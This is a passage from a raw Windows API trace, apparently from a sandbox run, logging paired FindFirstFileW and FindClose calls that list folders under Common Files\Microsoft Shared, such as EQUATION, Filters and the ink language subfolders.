ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.464] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.464] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.465] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.465] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.466] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.466] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.467] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.467] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.467] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.467] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.468] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.469] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.469] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.469] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.472] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.473] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.475] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.476] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.477] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.477] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.477] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.477] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.478] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.478] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.479] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.479] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.480] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.480] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.481] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.481] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.481] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.481] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.481] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.481] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.482] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.482] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.482] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.482] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.483] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.483] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.483] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.483] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.484] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.484] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.485] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.485] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.485] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.485] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.485] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.486] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.488] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.489] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.490] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.491] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.491] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.491] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.491] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.492] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.495] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.495] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.495] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.495] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.496] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.496] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.496] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.496] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.496] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.496] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.497] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.497] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.498] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.498] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.499] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.500] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.503] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.503] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, 